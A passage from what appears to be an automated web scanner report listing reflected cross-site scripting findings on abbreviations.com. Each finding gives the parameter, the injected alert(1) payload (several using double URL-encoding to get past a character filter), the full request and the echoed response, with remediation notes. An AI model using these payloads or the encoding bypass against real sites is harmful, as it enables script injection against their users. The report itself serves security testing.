Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:48 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does 5fc81</title><script>alert(1)</script>fedac000817 stand for?</title>
...[SNIP]...

2.23. http://www.abbreviations.com/bs.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40cdf"><script>alert(1)</script>4bbb37d871e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=40cdf"><script>alert(1)</script>4bbb37d871e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:13 GMT
Connection: close
Content-Length: 26899


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does 40cdf"><script>alert(1)</script>4bbb37d871e stand for?, What does 40cdf">
...[SNIP]...

2.24. http://www.abbreviations.com/bs.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb709"%3balert(1)//e93c20de0d6 was submitted in the st parameter. This input was echoed as eb709";alert(1)//e93c20de0d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bs.aspx?st=eb709"%3balert(1)//e93c20de0d6 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:38 GMT
Connection: close
Content-Length: 26509


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "eb709";alert(1)//e93c20de0d6";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "eb709";alert(1)//e93c20de0d6" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;

...[SNIP]...

2.25. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e was submitted in the REST URL parameter 1. This input was echoed as a2de4"><script>alert(1)</script>f2de11f4e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxa2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:43 GMT
Connection: close
Content-Length: 27149


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs2.aspxa2de4"><script>alert(1)</script>f2de11f4e6e stand for?, What does bs2.aspxa2de4">
...[SNIP]...

2.26. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 was submitted in the REST URL parameter 1. This input was echoed as 20e54</title><script>alert(1)</script>5cef4e545b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspx20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:33:43 GMT
Connection: close
Content-Length: 27292


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs2.aspx20e54</title><script>alert(1)</script>5cef4e545b4 stand for?</title>
...[SNIP]...

2.27. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d88af%2522%253balert%25281%2529%252f%252f9d70bb0239 was submitted in the REST URL parameter 1. This input was echoed as d88af";alert(1)//9d70bb0239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxd88af%2522%253balert%25281%2529%252f%252f9d70bb0239 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:14 GMT
Connection: close
Content-Length: 26683


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

2.28. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e was submitted in the REST URL parameter 1. This input was echoed as d35d7<script>alert(1)</script>f5e8b18658e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxd35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:36 GMT
Connection: close
Content-Length: 27076


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>f5e8b18658e";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>alert(1)</script>f5e8b18658e" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>
...[SNIP]...

2.29. http://www.abbreviations.com/bs2.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fa9"><script>alert(1)</script>04c67320817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=87fa9"><script>alert(1)</script>04c67320817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:19 GMT
Connection: close
Content-Length: 26593


<title>What does&nbsp;87FA9"><SCRIPT>ALERT(1)</SCRIPT>04C67320817&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;ov
...[SNIP]...
<meta name="keywords" content="What does 87fa9"><script>alert(1)</script>04c67320817 stand for?, What does 87fa9">
...[SNIP]...

2.30. http://www.abbreviations.com/bs2.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 41d8c</title><script>alert(1)</script>e632966bcd3 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=41d8c</title><script>alert(1)</script>e632966bcd3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:47 GMT
Connection: close
Content-Length: 26787


<title>What does&nbsp;41D8C</TITLE><SCRIPT>ALERT(1)</SCRIPT>E632966BCD3&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-rep
...[SNIP]...

2.31. http://www.abbreviations.com/bs2.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload a6ce2<script>alert(1)</script>eaf5fd2e670 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=a6ce2<script>alert(1)</script>eaf5fd2e670 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:21 GMT
Connection: close
Content-Length: 26523


<title>What does&nbsp;A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;over
...[SNIP]...
<span class="hdn">'A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670'</span>
...[SNIP]...

2.32. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 was submitted in the REST URL parameter 1. This input was echoed as ab542<script>alert(1)</script>78bee243156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspxab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:55 GMT
Connection: close
Content-Length: 27203


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78bee243156";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>alert(1)</script>78bee243156" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>
...[SNIP]...

2.33. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 was submitted in the REST URL parameter 1. This input was echoed as 173fe</title><script>alert(1)</script>df6bcc3c130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspx173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:18 GMT
Connection: close
Content-Length: 27385


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does getsugg.aspx173fe</title><script>alert(1)</script>df6bcc3c130 stand for?</title>
...[SNIP]...

2.34. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 was submitted in the REST URL parameter 1. This input was echoed as 3f167";alert(1)//2f81dfde9c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspx3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:24 GMT
Connection: close
Content-Length: 26852


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.h
...[SNIP]...

2.35. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc was submitted in the REST URL parameter 1. This input was echoed as c3ec8"><script>alert(1)</script>af1a48cd5fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspxc3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:36:54 GMT
Connection: close
Content-Length: 27223


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does getsugg.aspxc3ec8"><script>alert(1)</script>af1a48cd5fc stand for?, What does getsugg.aspxc3ec8">
...[SNIP]...

2.36. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec was submitted in the REST URL parameter 1. This input was echoed as fff86</title><script>alert(1)</script>c6029eb64ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspxfff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:09 GMT
Connection: close
Content-Length: 27473


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does justadded.aspxfff86</title><script>alert(1)</script>c6029eb64ec stand for?</title>
...[SNIP]...

2.37. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

